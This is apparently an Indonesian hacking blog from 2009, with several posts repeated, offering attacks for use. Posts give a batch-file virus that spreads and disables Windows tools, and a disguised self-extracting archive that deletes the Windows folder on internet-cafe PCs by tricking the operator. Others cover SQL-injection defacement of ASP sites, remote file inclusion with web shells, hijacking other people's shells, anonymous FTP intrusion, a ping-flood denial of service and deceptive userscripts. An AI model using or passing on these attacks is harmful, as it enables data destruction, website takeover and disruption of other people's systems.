Virus Development udah males dah di utak-atik lagi... jadi, kita bahas virus disini aja yak...
OK, sekarang kita buka notepad, lalu copas yang dibawah ini:
Echo off
If no exist c:\windows\%0copy0% c:\windows
For %%p in(A C D E F) do copy%0 %%p:
For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat
For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r
REG ADD HKCU\Software\Microsoft\Windows\currentVersion\
Explorer\advance/v ShowSuperHiden /t REG_DWORD/d 0/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFolderOption /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/vDisableTaskMgr /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFind /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/ vNoRun /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/v aktifkan /t REG_SZ/d C:\Windows\proyek1.bat
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoViewOnDrive /t REG_DWORD/d 4/f
REG ADD HKCU\Software\policies\Microsoft\Windows\System/v DIsableCMD /t REG_DWORD/d 2/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/DisableRegistryTools /t REG_DWORD/d 1/f
Shutdown –sd –t 60 –c “Nothing is Secure in this Cyber World, because, nothing's perfect... by ne0 d4rk fl00d3r”-f
Exit
Heheheehehe... yaudah, selamat mencoba!!!
P.S. Kalo mau masukin virusnya lewat flash disk bisa pakek Autorun.inf atau pakek RAR auto start.
---END---
Thanks to: jombi_par
Sumber: http://rahmatvinacerpus.wordpress.com
Sabtu, 31 Oktober 2009
Jumat, 30 Oktober 2009
Lock Web
Nah, kemaren kan sudah diceritakan tentang Localhost Manipulation, nah, sekarang kita pakek File HOST untuk meng-lock website...
Tutorial:
1. Buka C:\WINDOWS\system32\drivers\etc
2. Buka file HOST dengan Notepad
3. Akan keluar seperti ini kan:
4. Buka aja Facebook sekarang, nanti ada tulisan seperti ini:
Sekian......
---END---
Thanks to: SATANIC_H4X0R
Tutorial:
1. Buka C:\WINDOWS\system32\drivers\etc
2. Buka file HOST dengan Notepad
3. Akan keluar seperti ini kan:
# Copyright (c) 1993-1999 Microsoft Corp.Tambahin bawahnya 127.0.0.+1 diatasnya spasi link yang mau dilock, contohnya jadinya begini:
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
# Copyright (c) 1993-1999 Microsoft Corp.Dan seterusnyah........ abis itu, jangan lupa disave!
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.2 http://www.facebook.com
127.0.0.3 http://www.google.com
127.0.0.4 http:/www.kaskus.us
4. Buka aja Facebook sekarang, nanti ada tulisan seperti ini:
Unable to connectSama halnya dengan Google, dan Kaskus, tulisannya mirip-mirip lah... ^_^
Firefox can't establish a connection to the server at http://www.facebook.com
* The site could be temporarily unavailable or too busy. Try again in a few
moments.
* If you are unable to load any pages, check your computer's network
connection.
* If your computer or network is protected by a firewall or proxy, make sure
that Firefox is permitted to access the web
Sekian......
---END---
Thanks to: SATANIC_H4X0R
Selasa, 27 Oktober 2009
Deathly Dork untuk deface...
Akhirnya, setelah sekian lama, saya tidak blogging lagi, karena lupa password blogger gak ada bahan obrolan blogging...
Dan sekarang ada bahan nih, tentang Google Hacking.
Kan kalo mau melakukan Remote File Inclusion aka RFI kan harus nanempadi di sawah shell dan agak susah, kita akan mempelajari RFI cara gampang (dengan cara memakai shell taneman orang lain... :D)
Hanya dengan dork: "c99shell v. 1.0 pre-release build"
Kita bisa mendapatkan shell taneman orang laen... :D
Lalu kita langsyungz take over ajah... :D :D :D
Sekian...
---END---
Thanks to: cybermutaqqin
Dan sekarang ada bahan nih, tentang Google Hacking.
Kan kalo mau melakukan Remote File Inclusion aka RFI kan harus nanem
Hanya dengan dork: "c99shell v. 1.0 pre-release build"
Kita bisa mendapatkan shell taneman orang laen... :D
Lalu kita langsyungz take over ajah... :D :D :D
Sekian...
---END---
Thanks to: cybermutaqqin
Sabtu, 24 Oktober 2009
ASP Injection
Kita akan mempelajari ASP
Tutorial aja deh langsyungz.................
1. Cari target dulu dengan dork: inurl:default.asp?newsID=
2. Misalnya dapet target www.situs.com/default.asp?newsID=123
3. Tambain ' (single quote) dibelakang angka, akan keluar seperti ini:
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′4. Jika keluar kata-kata diatas, maka, kita tambahin ini untuk mencari bugnya: having 1=1 . jadinya begini: www.situs.com/default.asp?newsID=123 having 1=1 maka keluarnya adalah:
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号
/new_show.asp,行 89
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′5. Ketemu columnnya kan? ntuh dia si main.id
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
6. Masukin dibelakangnya: group by "column-nya" having 1=1;– Columnnya diganti column yg diatas itu, dalam kasus ini, columnnya main.id jadi begini: www.situs.com/default.asp?newsID=123 group by main.id having 1=1;– maka keluarnya adalah:
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′7. Ketemu titlenya... hehehehe.... (yang 'main.title')
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
8. Langsung aja Update dengan menambahkan: update main set title=’hacked by YOU’ jadinya, URLnya begini: www.situs.com/default.asp?newsID=123 update main set title='hacked by YOU' dan liat halaman utamanya.........
Sekian....
---END---
Thanks to: anak|jendral, Jo2, Hmei7, SATANIC_H4XOR
Rabu, 21 Oktober 2009
Desain Logo Tecon (isenk-isenk...)
Kemaren ada sayembara membuat logo tecon, jadi saya bikin aja dah... :D
Selamat menikmati... (HALAH! emank makanan??? ^_^)
---END---
Selamat menikmati... (HALAH! emank makanan??? ^_^)
---END---
Minggu, 18 Oktober 2009
FTP Attack
FTP (File Transfer Protocol) adalah Protocol khusus untuk File Transferring, jadi, FTP tidak bisa diakses lewat HTTP Protocol...
FTP Attack mengandalkan kelalaian admin dan kelalaian itu bisa membuat attacker Upload Download di FTP secara seenaknya dengan "Anonymous User"
Bagaimanakah caranya?
Letz go to Tutorialz...
1. Buka CMD aka Command Prompt
2. ketik di cmd ftp situs target.anda misalnya: ftp darknezzhacker.co.cc (maaf, blog saya gak bisa diserang! ^_^) tanpa www ya!
3. Jika yang keluar ini:
Connected to situstarget.com.
220---------- Welcome to PureFTPd 1.0.12 ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 15:21 and the load is 0.03. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (situstarget.com:(none)):
Berarti kamu beruntung dan bisa masuk
Kalo yang keluar seperti ini:
Connected to situstarget.com.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 21:31. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 30 minutes of inactivity.
User (situstarget.com:(none)):
atau ini:
Connected to situstarget.com.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:119.235.18.72]
User (situstarget.com:(none)):
Berarti gak bisa :( cari target lain okay?
4. Jika tampilannya seperti paling atas, berarti anda bisa masuk sebagai "Anonymous User" cara masuknya adalah isikan User Anonymous dan Password kosongkan saja...
5. Sudah masuk? OK, terserah apa kata hati anda, anda bisa melakukan Upload atau Download, atau liat-liat Directory dengan command-command yang sudah dirangkum disini: FTP Command maaf ya kalo bahasa
OK, sekian dulu yaah...
---END---
Thanks to: Ciebal dan S'to (lewat Bukunya: CEH)
Jumat, 16 Oktober 2009
Enskripsi File menjadi image
Dari Ciebal...
Bagaimana cara memasukkan file rar ke file gambar?
Sangat gampang... hanya bermodal CMD aka Command Prompt dan pastinya file-file sepert:
- file.rar (ato terserah)
- format.gif
- hasil.gif
(semuanya tempatkan di desktop)
Tutorial:
1. buka cmd
2. ketik cd desktop (untuk mengarahkan cmd ke desktop)
3. lalu ketik: copy /b format.gif+file.rar hasil.gif
4. klikz Enter
5. dan TA-DA! selesai deh... di hasil.gif sekarang terdapat file.rar untuk melihat hasilnya, klik kanan hasil.gif dan open with WinRAR
OK sekianz...
---END---
Sumber: www.ciebal.web.id
Thanks to: Hacker Center and Ciebal
Bagaimana cara memasukkan file rar ke file gambar?
Sangat gampang... hanya bermodal CMD aka Command Prompt dan pastinya file-file sepert:
- file.rar (ato terserah)
- format.gif
- hasil.gif
(semuanya tempatkan di desktop)
Tutorial:
1. buka cmd
2. ketik cd desktop (untuk mengarahkan cmd ke desktop)
3. lalu ketik: copy /b format.gif+file.rar hasil.gif
4. klikz Enter
5. dan TA-DA! selesai deh... di hasil.gif sekarang terdapat file.rar untuk melihat hasilnya, klik kanan hasil.gif dan open with WinRAR
OK sekianz...
---END---
Sumber: www.ciebal.web.id
Thanks to: Hacker Center and Ciebal
UserScript untuk mencurangi KumpulBlogger
Sering banged yea saya ngisengin system... tapi inilah nafsu seorang Newbie... (Halah! apa sih? wkwkwk...)
Taudah, kita akan bahas caranya...
Jadi, tadi itu gempa... (Halah! Udah! Udah! jangan bahas gempa deh...)
OK, it's time to serious! Jadi, kita akan sedikit Social Engineering kepada beberapa orang... (sedikit nakal) menarik orang-orang untuk memakai UserScript kita!
Misalnya:
- Kamu promosiin UserScript kamu di Facebook dengan kedok bisa ganti template facebook, dll.
- Di MafiaWars fans, dengan kedok UserScript Bots
- Di Travian Cheater ato Travian Fans dengan kedok untuk bermain Travian dengan mudah...
- dan laen-laen
Saya mendapat ide ini dari Cruz3N Tecon yang membuat Klik Otomatis KumpulBlogger tapi saya akan membahas tentang trik saya sendiri...(saya harus tetap eksiz...
)Wokeh, letz go tentang logikanya
Kita akan redirect pengguna dari Facebook dan penjuru subdomain dan sejuta pagenya, lalu google, fiendster, my space, youtube,
Lalu anda buat suatu file di Notepad, Source Code:
// ==UserScript==
// @name KumpulBlogger
// @author ne0 d4rk fl00d3r
// @description XWET
// @include *.facebook.com/*
// @include www.facebook.com
// @include *google.*/*
// @include www.youtube.com/*
// @include *.friendster.com/*
// ==/UserScript==
document .location="javascript:popUpWindow('URL reff KumpulBlogger anda', 0, 0, 536, 580)"
Wkwkwk, ntuh script untuk buka pop-up window yang keluar adalah reff Link KumpulBlogger anda kan bakal makin kaya... wkwkwk....
OK, sekian dah...
---END---
Selasa, 13 Oktober 2009
Keyboard Rusak?
Tadi ada sedikit kepanikan yaitu Keyboard Komputer saya rusak, sementara pembantu saya pergi beli batere, saya masih berselancar, ada 2 cara untuk mengetik URL tanpa keyboard:
1. Virtual Keyboard
Tau kan Virtual Keyboard? Kita bisa mengetik dengan mengklik tombol-tombol di monitor...
2. Copy-Paste Technique
Baru tau tekhnik ini? Tekhnik ini adalah tentang Copy-Paste huruf-huruf yang bertebaran di komputermu, contoh: kamu ke HELP di app apa aja, trus anda copas aja hurufnya atu2 ke address bar... (HEHEHE)
"Wow! Trik bodoh tapi berguna..."
~ Somebody to ne0 d4rk fl00d3r
Udah dulu yeah...
(Mau belajar dulu, besok masih UTS, doakan aku teman-teman... ^_^)
---END---
1. Virtual Keyboard
Tau kan Virtual Keyboard? Kita bisa mengetik dengan mengklik tombol-tombol di monitor...
2. Copy-Paste Technique
Baru tau tekhnik ini? Tekhnik ini adalah tentang Copy-Paste huruf-huruf yang bertebaran di komputermu, contoh: kamu ke HELP di app apa aja, trus anda copas aja hurufnya atu2 ke address bar... (HEHEHE)
"Wow! Trik bodoh tapi berguna..."
~ Somebody to ne0 d4rk fl00d3r
Udah dulu yeah...
(Mau belajar dulu, besok masih UTS, doakan aku teman-teman... ^_^)
---END---
Senin, 12 Oktober 2009
Destroy the Admin's Computer!!! plus seisi Warnet!
Wew, ada trick baru neeh tapi Untested dan 30% kita ikut menjadi korban :'(
Tapi itu bisa dibayar dengan "mungkin" warnet gratis atau kehancuran warnet (karena kompi admin harus install ulang)
KHUSUS UNTUK ORANG-ORANG BERKEPERLUAN UNTUK MENGHANCURKAN WARNET!!! (Tapi maaf, saya tidak bertanggung jawab bila ada kesalahan... No Pain, No Gain akagak ada si Pain, gak bakal jadi kuat loe... Gak ada luka ya gak bakal maju)
To de poin...
OK, pertama kita buat file cmd dl0, dengan Notepad, isinya:
erase C:WINDOWS
lalu save dengan nama: tugas.cmd (nama untuk penyamaran supaya gak dicurigain sebagai "destroyer file")
Lalu, trik supaya nyala ntuh file, maka kita masukkan kedalam file RAR dan diset begini:
- Supaya anda gak dicurigain, supaya ada file buat kedok print, jadi loe masukin file menyerupai tugas seperti copas artikel yang berguna, trus kamu jadiin RAR (satuin sama tugas.cmd) misalkan namanya tugas.doc dan laen-laen
- Pilih tugas.cmd dan tugas.doc lalu klik kanan pada file lalu klik WinRAR lalu pilih Add to Archive
- Isi Archive name terserah (mungkin tugas.exe atau apalah...) lalu centang Create SFX Archive
- Klik Tab Advanced lalu klik tombol SFX Options... lalu isikan Path to Extract jadinya C:/Documents and Settings lalu Isikan "Run after Extraction" "tugas.cmd"
- Lalu klik tab Modes lalu pilih opsi Hide All dan Overwrite all files
- Klik OK untuk memulai Packing!
Mulailah sedikit Soceng (hehehe, ini adalah aksi yang paling menegangkan, kalo gagal, ya paling kamu diblack-list ama admin... dan gatot dah... (gagal total))
HACKER vs Operator
OK, anda pura-pura pengen print, dialognya kayak gini:
Ket: H: Kamu Op: Operator
H: Mas, mau ngeprint (sambil menyodorkan flash disk)
Op: (Colok flash disk) Filenya yang mana de?
H: Yang tugas tapi diextract dulu
Op: (extract)
H: Kayaknya langsung diextract ke Documents and Settings deh...
---File cmd attack---
---Print---
H: Trima kasih
Abis itu Warnet pun Game Over setelah restrart (ato langsung? gak tau juga deh...)
===GAME OVER===
OK, selesailah sudah Wicked Trick ini
Selamat Menghancurkan...
---END---
Thanx to Ichito-Bandito dan SpyroKiD
Tapi itu bisa dibayar dengan "mungkin" warnet gratis atau kehancuran warnet (karena kompi admin harus install ulang)
KHUSUS UNTUK ORANG-ORANG BERKEPERLUAN UNTUK MENGHANCURKAN WARNET!!! (Tapi maaf, saya tidak bertanggung jawab bila ada kesalahan... No Pain, No Gain aka
To de poin...
OK, pertama kita buat file cmd dl0, dengan Notepad, isinya:
erase C:WINDOWS
lalu save dengan nama: tugas.cmd (nama untuk penyamaran supaya gak dicurigain sebagai "destroyer file")
Lalu, trik supaya nyala ntuh file, maka kita masukkan kedalam file RAR dan diset begini:
- Supaya anda gak dicurigain, supaya ada file buat kedok print, jadi loe masukin file menyerupai tugas seperti copas artikel yang berguna, trus kamu jadiin RAR (satuin sama tugas.cmd) misalkan namanya tugas.doc dan laen-laen
- Pilih tugas.cmd dan tugas.doc lalu klik kanan pada file lalu klik WinRAR lalu pilih Add to Archive
- Isi Archive name terserah (mungkin tugas.exe atau apalah...) lalu centang Create SFX Archive
- Klik Tab Advanced lalu klik tombol SFX Options... lalu isikan Path to Extract jadinya C:/Documents and Settings lalu Isikan "Run after Extraction" "tugas.cmd"
- Lalu klik tab Modes lalu pilih opsi Hide All dan Overwrite all files
- Klik OK untuk memulai Packing!
Mulailah sedikit Soceng (hehehe, ini adalah aksi yang paling menegangkan, kalo gagal, ya paling kamu diblack-list ama admin... dan gatot dah... (gagal total))
HACKER vs Operator
OK, anda pura-pura pengen print, dialognya kayak gini:
Ket: H: Kamu Op: Operator
H: Mas, mau ngeprint (sambil menyodorkan flash disk)
Op: (Colok flash disk) Filenya yang mana de?
H: Yang tugas tapi diextract dulu
Op: (extract)
H: Kayaknya langsung diextract ke Documents and Settings deh...
---File cmd attack---
---Print---
H: Trima kasih
Abis itu Warnet pun Game Over setelah restrart (ato langsung? gak tau juga deh...)
===GAME OVER===
OK, selesailah sudah Wicked Trick ini
Selamat Menghancurkan...
---END---
Thanx to Ichito-Bandito dan SpyroKiD
Minggu, 11 Oktober 2009
Anti Facebook
Yeah, ada lagi nih UserScript gendeng dari saya...
Anti Facebook yaitu Script untuk mendeny website Facebook dengan meredirect ke www.google.com (beserta IP server dan segala penjuru subdomainnya)
Kegunaan:
- Kalo dikantor biasanya kita harus ngeblock fb supaya kinerja karyawan dan karyawati meningkat
- Triple Protection:
+ Block situs facebook dari access
+ Block IP server facebook dari access
+ Block lewat UserScript gw
Install aja dari sini: Anti Facebook
---END---
Anti Facebook yaitu Script untuk mendeny website Facebook dengan meredirect ke www.google.com (beserta IP server dan segala penjuru subdomainnya)
Kegunaan:
- Kalo dikantor biasanya kita harus ngeblock fb supaya kinerja karyawan dan karyawati meningkat
- Triple Protection:
+ Block situs facebook dari access
+ Block IP server facebook dari access
+ Block lewat UserScript gw
Install aja dari sini: Anti Facebook
---END---
Sabtu, 10 Oktober 2009
Directoryku yang baru
Curhat dulu yuk!
Tadi pas pengen upload shell-shell yang gw dapet di 000webhost, tapi kalo pakek ftpnya dia harus pakek domain laen, gak bisa pakek domain gratisannya dia :'( Harus pakek domain laen... Pas diregist di .co.cc, trus gw bingung cara pakek domainnya di 000webhost, gw harusnya ngesetnya pas pertama kali gw bangun ntuh website, yaudah, gw masukin ke parked domain en, malemnya, JREEENG!!!
....
.....
Bisa? GAK BISA!!! tetep yang keluar ngaco!! shell gw gak bisa dibuka (NTOD!)
Yaudah, segeralah tinggalkan 000webhost yang sedikit sinting tersebut dan memulaihidup baru di freehostia eit, freehostia terlalu aneh, soalnya suka delete website orang yang gak berdosa... (yang gak berdosa aja didelete, apalagi web yang isinya shell semua?) jadi, memulai lagi di ucoz (sama aje donk...)
OK, kalian bisa ambil shell dari website saya (gratis!*)
*Belum termasuk biaya akses internet (^_^)
OK, langsung aja ke TKP gan... Neo Directories
---END---
Tadi pas pengen upload shell-shell yang gw dapet di 000webhost, tapi kalo pakek ftpnya dia harus pakek domain laen, gak bisa pakek domain gratisannya dia :'( Harus pakek domain laen... Pas diregist di .co.cc, trus gw bingung cara pakek domainnya di 000webhost, gw harusnya ngesetnya pas pertama kali gw bangun ntuh website, yaudah, gw masukin ke parked domain en, malemnya, JREEENG!!!
....
.....
Bisa? GAK BISA!!! tetep yang keluar ngaco!! shell gw gak bisa dibuka (NTOD!)
Yaudah, segeralah tinggalkan 000webhost yang sedikit sinting tersebut dan memulai
OK, kalian bisa ambil shell dari website saya (gratis!*)
*Belum termasuk biaya akses internet (^_^)
OK, langsung aja ke TKP gan... Neo Directories
---END---
Penghancuran Warnet (Hanya sedikit pemikiran dari otak kami)
Gambar diatas adalah sedikit pemikiran saya dan teman saya di Tecon (Sebenernya temen satu sekolah ^_^) yang namanya Criszz (Nama Handle) Memang hancur gambarnya, dan saya akan menjelaskannya:
1. Satu orang utusan Hacker pergi ke warnet target. (Pastikan warnet target memakai LAN)
2. Utusan Hacker itu mendapatkan IP address
3. Utusan Hacker itu mengirimkan IP Address ke komputer Hacker
4. Hacker mendapat IP address (misalnya IP address-nya: 111.666.230.81)
5. Karena warnet itu memakai LAN, mereka punya 1 IP Address untuk 7 komputer (di gambar)
6. Hacker melakukan DoS ke target dengan memasukkan
7. Koneksi Warnet pun lumpuh... dan...
Warnetnya sudah game over (kalo si Hacker baek sih, gak game over ^_^) tergantung Hackernya, kalo jahat ya didiemin terus sampe besok pagi... :D
Jadi, saya juga mengajarkan tentang DoS dengan Command Prompt yaitu dengan memakai command ini: ping IP -l 65500 -n 10000000 -w 0.00001
IP diganti IP target.
Dijamin jaringan internet dia lumpuh dan game over
NOTE: Bisa juga targetnya website!
---END---
Kamis, 08 Oktober 2009
UserScript Anti Tunggu Download Free User Rapidshare dan 4shared
Setelah 3 Hari membuat UserScript buat akalin Timernya Rapidshare secara Otomatis (Thx to SpyroKiD)
Karena Judulnya aneh, mohon dimaklumi, karena saya tidak terlalu pintar untuk membuat judul yang pas...
History Version UserScript (from zero to HERO :D) dari waktu ke-waktu:
1. Cuma pakek JavaScript ini: javascript:alert(c=0) ternyata gagal karena JavaScript itu aktif pertama kali lalu Timernya telat keluarnya, jadi gak bisa dijadiin 0 deh...
2. Pakek JavaScript sleep() dan wait() (Untuk tunggu sebelum JavaScript aktif) ternyata gak bisa karena gw gak bisa pakek javascriptnya...
3. Yang berhasil: pakek redirection! redirectnya ke javascript:alert(c=0) (Hahaha)
Itulah historynya... dan saya akan membagikannya untuk anda semua sekalian...
USERSCRIPTNYA
Sudah dulu yeah...
---END---
Thanks to: SpyroKiD yang udah kasih tau tentang kelemahan Rapidshare...
Karena Judulnya aneh, mohon dimaklumi, karena saya tidak terlalu pintar untuk membuat judul yang pas...
History Version UserScript (from zero to HERO :D) dari waktu ke-waktu:
1. Cuma pakek JavaScript ini: javascript:alert(c=0) ternyata gagal karena JavaScript itu aktif pertama kali lalu Timernya telat keluarnya, jadi gak bisa dijadiin 0 deh...
2. Pakek JavaScript sleep() dan wait() (Untuk tunggu sebelum JavaScript aktif) ternyata gak bisa karena gw gak bisa pakek javascriptnya...
3. Yang berhasil: pakek redirection! redirectnya ke javascript:alert(c=0) (Hahaha)
Itulah historynya... dan saya akan membagikannya untuk anda semua sekalian...
USERSCRIPTNYA
Sudah dulu yeah...
---END---
Thanks to: SpyroKiD yang udah kasih tau tentang kelemahan Rapidshare...
Senin, 05 Oktober 2009
Tutorial RFI (Yang ditunggu-tunggu dan dinanti-nanti)
Akhirnya Update juga, setelah jalan-jalan dari Yogyacarderlink (ternyata isinya orang gila semua! piis om-om gay dari Yogyacarder! ^_^ Ane gak maksud untuk menjelek-jelekkan ^_^ ^_^ ^_^)
RFI adalah: Remote File Inclusion, yaitu Suatu teknik Hacking dengan meng-include-kan file ke suatu website yang ada bug RFI-nya lewat backdoor (jalur belakang aka pintu belakang)
Macam-macam Backdoor aka Web Shell:
1. c99.txt
2. c100.txt
3. r57.txt
4. ekin0x
5. locus7
Darimana anda bisa mendapatkannya yaitu tempat yang hanya 6 huruf: G-O-O-G-L-E
Tutorialz:
1. Sebelum melakukan RFI, ada baiknya kita persiapkan diri:
- Berdoa menurut kepercayaan masing-masing
- Web Browser
- Shell yang udah didapatkan (kalo dapet dari punya orang laen, mending dicatet URL-nya, soalnya kita bakal pakek buat RFI-nya, kalo punya sendiri, upload dulu ke hostingan dan saya anjurkan untukmeminumnya 3x sehari supaya efeknya 100% memakai hosting 000webhost.com atawa freewebtown.com kalo gak mau suspend dengan cepat dan mudah, sangat tidak dianjurkan untuk bertemu Roy Suryo memakai freehostia karena menurut para gay warga Yogyacarderlink freehostia upload shell langsung disuspend... lalu anda catet URL-nya, nanti bakal dipakek)
- akses ke milw0rm/Kumpulan Bug RFI (dipilih aje atu2)
2. Buka milw0rm lalu cari bug RFI (di search ketik: RFI) lalu ambil salah satu bug RFI.... atawa kalo udah dapet bug RFI, yaudah...
3. Search digoogle Bugsnya misal exploitna: admin/aaa/direktori/direktori2/file=[shell] ya carinya inurl:admin/aaa/direktori/direktori2/file=
4. Comot satu target (bahasanya ambhuradhul) misalnya dapet: www.target.com/admin/aaa/direktori/direktori2/file=tolol.txt
5. Ganti tolol.txt jadi URL shellnya, jadinya begini: www.target.com/admin/aaa/direktori/direktori2/file=www.situsgue.hosting.com/shell/c99.txt? (jangan lupa ditambah "?" tanpa tanda kutip (Tanda tanya))
6. Kalo gak keluar shellnya (ada fasilitas Upload dan buat Masukin Codenya, pokoknya mirip-mirip FTP Manager gituu...) berarti gak vuln lagi, jangan sedih dan marah, cari aja yang laen... ^_^ kalo keluar shellna, lanjoet aje... tinggal kita takeover ntu wepsait... (NGIHAHAHAHAHA!!!)
7. Kita pakek command-command berikut buat takeover:
Uname -a = Melihat jenis or nama server or type server yg di gunakan !!!!
cat /etc/issue = melihat jenis kernel dari suatu server !!!!
curl -o , wget , lwp-download = mendownload sebuah file
find = mencari ( tampilkan , temukan )
8. Terserah mahu ngapain (logatnya mulai agak najis... ^_^)
---END---
Thanks to: kiddies dan ycl dari Yogyacarderlink
Sumber: yogyacarderlink.web.id
RFI adalah: Remote File Inclusion, yaitu Suatu teknik Hacking dengan meng-include-kan file ke suatu website yang ada bug RFI-nya lewat backdoor (jalur belakang aka pintu belakang)
Macam-macam Backdoor aka Web Shell:
1. c99.txt
2. c100.txt
3. r57.txt
4. ekin0x
5. locus7
Darimana anda bisa mendapatkannya yaitu tempat yang hanya 6 huruf: G-O-O-G-L-E
Tutorialz:
1. Sebelum melakukan RFI, ada baiknya kita persiapkan diri:
- Berdoa menurut kepercayaan masing-masing
- Web Browser
- Shell yang udah didapatkan (kalo dapet dari punya orang laen, mending dicatet URL-nya, soalnya kita bakal pakek buat RFI-nya, kalo punya sendiri, upload dulu ke hostingan dan saya anjurkan untuk
- akses ke milw0rm/Kumpulan Bug RFI (dipilih aje atu2)
2. Buka milw0rm lalu cari bug RFI (di search ketik: RFI) lalu ambil salah satu bug RFI.... atawa kalo udah dapet bug RFI, yaudah...
3. Search digoogle Bugsnya misal exploitna: admin/aaa/direktori/direktori2/file=[shell] ya carinya inurl:admin/aaa/direktori/direktori2/file=
4. Comot satu target (bahasanya ambhuradhul) misalnya dapet: www.target.com/admin/aaa/direktori/direktori2/file=tolol.txt
5. Ganti tolol.txt jadi URL shellnya, jadinya begini: www.target.com/admin/aaa/direktori/direktori2/file=www.situsgue.hosting.com/shell/c99.txt? (jangan lupa ditambah "?" tanpa tanda kutip (Tanda tanya))
6. Kalo gak keluar shellnya (ada fasilitas Upload dan buat Masukin Codenya, pokoknya mirip-mirip FTP Manager gituu...) berarti gak vuln lagi, jangan sedih dan marah, cari aja yang laen... ^_^ kalo keluar shellna, lanjoet aje... tinggal kita takeover ntu wepsait... (NGIHAHAHAHAHA!!!)
7. Kita pakek command-command berikut buat takeover:
Uname -a = Melihat jenis or nama server or type server yg di gunakan !!!!
cat /etc/issue = melihat jenis kernel dari suatu server !!!!
curl -o , wget , lwp-download = mendownload sebuah file
find = mencari ( tampilkan , temukan )
8. Terserah mahu ngapain (logatnya mulai agak najis... ^_^)
---END---
Thanks to: kiddies dan ycl dari Yogyacarderlink
Sumber: yogyacarderlink.web.id
Jumat, 02 Oktober 2009
UserScript Isengin temen yang pake Gmail
Udah lama gak update blog jelek ini selama 2 hari (2 hari itu lama apa bentar ya?)
OK, saya langsung aja, saya melihat SpyroZone Update lagi! (Cihuuy! Akhirnya!) setelah beberapa hari yang lalu yaitu sekitar 2 bulan yang lalu (2 bulan itu bentar apa lama seeh???) dan Updatenya adalah: Malicious User Script! Hati-hati dengan Browser anda, karena anda bisa terbunuh olehnya...
Sebelum kita sharing Malicious User Script, Apakah itu UserScript?
Menurut Wikipedia ala saya (Halah...): User Script adalah JavaScript yang sudah diset oleh pengguna untuk Browsernya, supaya JavaScript itu aktif PERTAMA KALI (PERTAMAX! katanya Kaskuser) di beberapa situs yang diinginkan.
Contoh penggunaan User Script:
- Mengganti tampilan Google jadi lebih indah
- Mengganti tampilan Gmail jadi lebih indah
- Menambahkan Fasilitas di Blogger yaitu Emoticons
- Bot untuk MafiaWars di Facebook (biar maennya otomatis, kita gak perlu maen, biarkan bot itu yang mengerjakannya ^_^)
- dan lain-lain, liat aja di userscripts.org
Browser yang Support User Script:
- Opera: Secara Default udah ada...
- Mozilla Firefox: Pake Add-Ons Greasemonkey
- Internet Explorer, Google Chrome, Safari: Tanya om google tentang add-onsnya
Taukah anda bahwa kita bisa memakai UserScript untuk hal yang sangat MENGERIKAN! Hahahahahaha!!!
Misalnya: Windows bisa macet gara-gara buka tab terus, atau yang kita bicarakan sekarang, yaitu: INBOX GMAIL BOMBER (Bikin-bikin ndiri namanya... ^_^)
OK, source code didapat dari SpyroKiD pastinyah!!!
SOURCE CODE
Yea, segitu aja dulu yea...
OK, Stay on your channel in darknezzhacker.co.cc
There's more tips and trick or tutorial in Darkness Hacker...
So stay Hacking! ;)
---END---
Sumber: spyrozone.net
OK, saya langsung aja, saya melihat SpyroZone Update lagi! (Cihuuy! Akhirnya!) setelah beberapa hari yang lalu yaitu sekitar 2 bulan yang lalu (2 bulan itu bentar apa lama seeh???) dan Updatenya adalah: Malicious User Script! Hati-hati dengan Browser anda, karena anda bisa terbunuh olehnya...
Sebelum kita sharing Malicious User Script, Apakah itu UserScript?
Menurut Wikipedia ala saya (Halah...): User Script adalah JavaScript yang sudah diset oleh pengguna untuk Browsernya, supaya JavaScript itu aktif PERTAMA KALI (PERTAMAX! katanya Kaskuser) di beberapa situs yang diinginkan.
Contoh penggunaan User Script:
- Mengganti tampilan Google jadi lebih indah
- Mengganti tampilan Gmail jadi lebih indah
- Menambahkan Fasilitas di Blogger yaitu Emoticons
